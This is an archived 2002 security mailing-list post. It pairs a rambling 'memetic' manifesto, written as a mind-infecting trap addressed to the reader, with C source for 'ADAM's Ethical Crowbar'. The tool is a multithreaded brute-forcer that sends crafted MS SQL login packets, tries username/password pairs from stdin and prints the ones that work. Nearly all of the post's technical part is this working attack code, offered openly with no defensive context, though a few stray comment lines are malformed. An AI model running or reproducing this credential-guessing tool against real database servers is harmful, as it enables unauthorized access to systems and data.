OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
memetic-engineer_at_hushmail.com
Date: Tue Aug 13 2002 - 14:50:56 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    /*ms sql brute thing found in wild, appears to be by some guy named adam
     * No post meme =no post code. Don't sell to anyone please

    *ACHTUNG!:

     *This text is a neurolinguistic trap, whose mechanism is triggered by
    *you at the moment when you subvocalize the words MeMe156, words that
    *have now begun to infiltrate your mind in the same way that a computer
    *virus might infect an artificially intelligent machine: already the
    *bits of phonetic information stored within the words MeMe156 are
    *using your neural circuitry to replicate themselves, to catalyze the
    *crystalline growth of their own connotative network.

     *The words MeMe156 actually germinate via the subsequent metaphor into
    *an expanding array of icy tendrils, all of which insinuate themselves
    *so deeply into the architecture of your thoughts that the words MeMe
    *156 cannot be extricated without uprooting your mind.

     *The consequences of this infection are not immediately obvious,
    *although you may find yourself beginning to think fleetingly of certain subcultural terms, such as
    *ANTI-SEC and WHITE-HAT-HOLOCAUST, which may in turn compel you to think of NEOGNOSTICISM and MEMETICS: the whispered fragments perhaps of some overheard conversation.

     *We refer to ourself both as agent, and agency in, on, and about the www. We are symbiotic
    *substrain of Darren Wershler-Henry, Genesis P-Orridge, Dawkins, Moritz, and AC's #23 ( forever
    *useful in advanced symbiotic binding techniques such as copying-fidelity, fecundity, and
    *longevity). We refer to other sub.systems, and in doing so, interweave their memetic approaches
    *with our own. From original /v23/substrain.virulent.excess, our growth has propagated exponentially
    *and has begun to infect the highest levels of INFOSEC, press, radio, and film.

     *We refer to musical works, "Deer Dance" by SOAD, "Karma Police" by Radiohead and "Canon in D" by Johan Pachelbel.

     *We refer to literary works, "Book of Five Rings",by Miyamoto Musashi, "Secret Societies and
    *Subversive Movements" by Nesta Webster, and "How to Think like Leonardo Da Vinci: Seven Steps to Genius Every Day" by Michael J. Gelb ( Substrain /How.to.Think.Like.Machiavelli in incubation stages).

    * We refer to the artistic work of "Obey Giant" and "Billboard Liberation Front"

     *We refer to the following fields of study:
    *Complexity theory and post-structuralism;
    *Memetics as an integrative field for the study of ALL fields;
    *Autology as a means to community cohesion and survival.

     *We refer to a self-propagating system of TAZ's (Temporary Autonomous Zones), within related, and
    *non-related mailing lists, IRC channels, and FreeNets which are working in loose alliance to affect
    *and direct the post-millenial attractor, utilizing the principle of auto.prophecy. We compel
    *approach toward TAZ's which concentrate on NEGentropic self-orginization rather than the deliberate
    *hastening of maximal entropy.

    * W/e refer to and admit our viral precursors, to which we are anti-genic, and posit our decendants
    *in struggle to fix the subsequent global attractor. We have an expiration date. Which we find VERY
    *attractive.

    * We refer to multiple sub.strains of ourself, many of which are contradictory: We refer toagain to
    *the ultimate resistance of NEGentropic memetic antibodies which, once triggered by this antigen,
    *must be responsible for isolating entropic memes.

    * We refer to all signifiers, all that is signified, and the resultant significance on both global
    *and local scales.

     *We refer to that which we contain, and that in which we are contained;

     *We refer now to you.

     *When you have finished reading the remaining nineteen words, this
    *process of irreversible infection will be completed, and you will
    *depart, believing yourself largely unaffected by this process.

    *MeMe156/agent.agency.08.13.02

    #include <stdio.h>
    #include <sys/time.h>
    #include <unistd.h>
    #include <string.h>
    #include <stdlib.h>
    #include <fcntl.h>
    #include <errno.h>
    #include <signal.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <pthread.h>

    #define USERNAME_OFF 0x27
    #define PASSWORD_LEN1_PAD 0x45
    #define PASSWORD_TXT1 0x46
    #define PASSWORD_LEN_REAL1 0x64
    #define PASSWORD_LEN_REAL2 0xd3
    #define PASSWORD_TXT2 0xd4
    #define PASSWORD_LEN_PLUS2 0x1d1
    #define REPLY_TIMEOUT 5
    #define MYNULL "%%NULL%%"

    #include "libInet.c"

    struct super_mssql_force
    {
      u_long ip;
      u_long port;
      FILE *login_pass;
      int sport;
    };

    * Oh my! Tricky French comments ensue..
    char fidel_packet[] =
    "\x2\x0\x2\x0\x0\x0\x2\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    /* | ici start l'username */
    "\x00\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    /* | longeur du passe suivi du pass atention pading! */
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0\x0\x0"

    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    /* | longeur du pass real ou pad je sais pas */
    "\x00\x30\x30\x30\x30\x30\x34\x31\x38\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x60\x8\x90\x49\x74\x8\x3\x1\x6\xa\x9\x1\x1\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x4d\x69\x63\x72\x6f\x73\x6f\x66\x74\x20\x49\x53"
    "\x51\x4c\x2f\x77\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x10\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    /* | longeur du pass sans pad et pass */
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x00\x00\x00\x00\x00\x00\x00\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"

    /*****************| <== longeur du pass + 2 ***********/
    "\x0\x0\x0\x0\x0\x00\x4\x2\x0\x0\x4d\x53\x44\x42\x4c\x49\x42\x0\x0\x0"
    "\x7\x6\x0\x0\x0\x0\xd\x11\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x2\x1\x0\x4c\x0\x0\x3\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x1\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0"
    "\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x0\x30\x30\x30\x0\x0\x0\x3"
    "\x0\x0\x0\x0\x0\x0\x0\x0";

    char *
    tstrstr(char *buff,char *w,int size)
    {
    register int i;
    register int a;
    int d;
    int z;
    int ws = strlen (w);

    for(i=0;i<size;i++)
     {
       z=i;
       d=0;
       for (a=0;a<strlen(w);a++) {
          if(i+a >size)return(NULL);
          if (buff[z++] == w[a]) d++;
          else break;
          }

       if (d == ws)
         return( (buff+i) );

     }
    return(NULL);
    }

    mssql_attack (struct super_mssql_force * mssql)
    {
    char user[255];
    char pass[255];
    char tmp[4018];
    char * real_pkt;
    FILE * F;
    int s;
    int r;

      while (1)
          {

           s = connect_ip (mssql->ip, mssql->port, mssql->sport);

           if (s < 0)
            {
             return;
            }

            if (feof (mssql->login_pass))
            {
            if (s)
            close (s);
            return (0);
            }

            memset (user,0,sizeof(user));
            memset (pass,0,sizeof(pass));

            fscanf (mssql->login_pass, "%s%s\n", &user, &pass);

            if (strcmp (pass,MYNULL) == 0)
               memset (pass,0,sizeof(pass));

            real_pkt = calloc (1, sizeof (fidel_packet)-1);

            memcpy (real_pkt, fidel_packet, sizeof (fidel_packet)-1);

            strcpy ( (real_pkt + USERNAME_OFF), user);

            * (real_pkt + PASSWORD_LEN1_PAD ) = strlen (pass) + 2;

            strcpy ( (real_pkt + PASSWORD_TXT1), pass);

            * (real_pkt + PASSWORD_LEN_REAL1) = strlen (pass);

            * (real_pkt + PASSWORD_LEN_REAL2) = strlen (pass);

            strcpy ( (real_pkt + PASSWORD_TXT2), pass);

            * (real_pkt + PASSWORD_LEN_PLUS2) = strlen (pass) + 2;

            if (write (s,real_pkt,sizeof(fidel_packet)) < 0)
             {
              perror ("write");
              return;
             }

            if ( (r = read (s,tmp,sizeof (tmp)) ) < 0)
             {
              perror ("read");
              return;
             }

            if (tstrstr (tmp,"Login failed",r))
              {
              fprintf (stderr,"login failed for %s/%s\n",user,pass);
              close (s);
              continue;
              }

            printf ("%s:%s\n",user,pass);
            close (s);
            continue;
        }

    }

    usage (char * name)
    {
    printf ("ADAM's Ethical Crowbar! \n");
    printf ("never forget your crowbar !\n");
    printf ("%s <host> <port> -t <thread num> -s <src port>\n",name);
    exit (0);
    }

    main (int argc, char **argv)
    {
      pthread_t **pthread_id;
      int t_num = 3;
      int i;

      struct super_mssql_force mssql;

      memset (&mssql, 0, sizeof (mssql));

      if (argc < 3)
        usage (argv[0]);

      mssql.ip = host2ip (argv[1]);
      mssql.port = atoi (argv[2]);

    /* we ignore Broken Pipe ! */
      signal (13, SIG_IGN);

      if (argc > 3)
        {
          for (i = 3; i < argc; i++)
            {
              if (argv[i][0] == '-')
                switch (argv[i][1])
                  {
                  case 't':
                    t_num = atoi (argv[i + 1]);
                    i++;
                    break;

                  case 's':
                    mssql.sport = atoi (argv[i + 1]);
                    i++;
                    break;
                  }
            }
        }

    /* we read login password from the stdin */

      mssql.login_pass = stdin;

    /* only one socket can bind at the same src port */

      if (mssql.sport)
        {
          t_num = 1;
          fprintf (stderr,
                   "*** WARNING WHEN YOU USE THE SRC THREAD NUM ARE SET TO 1 ***\n");
        }

      fprintf (stderr, "mssql sport %i\n", mssql.sport);
      fprintf (stderr, "thread %i\n", t_num);

    /* if the user dont know how try the mssql allow we count it for him! */

      pthread_id = calloc (1, sizeof (pthread_t *) * t_num);

      for (i = 0; i < t_num; i++)
        pthread_id[i] = calloc (1, sizeof (pthread_t));

      for (i = 0; i < t_num; i++)
        pthread_create (pthread_id[i], NULL, (void *(*)()) mssql_attack, &mssql);

      for (i = 0; i < t_num; i++)
        pthread_join (*pthread_id[i], NULL);

    }

    -----BEGIN PGP SIGNATURE-----
    Version: Hush 2.1
    Note: This signature can be verified at https://www.hushtools.com

    wmUEARECACUFAj1ZYyoeHG1lbWV0aWMtZW5naW5lZXJAaHVzaG1haWwuY29tAAoJEIHY
    1pE2l0bfx9wAn2ZPGS0ZDRvrm6WL+PE4seyDDNjwAKC1g16QGxgPft6mWy+zEd8IauCb
    Pg==
    =m+Zb
    -----END PGP SIGNATURE-----

    Communicate in total privacy.
    Get your free encrypted email at https://www.hushmail.com/?l=2

    Looking for a good deal on a domain name? http://www.hush.com/partners/offers.cgi?id=domainpeople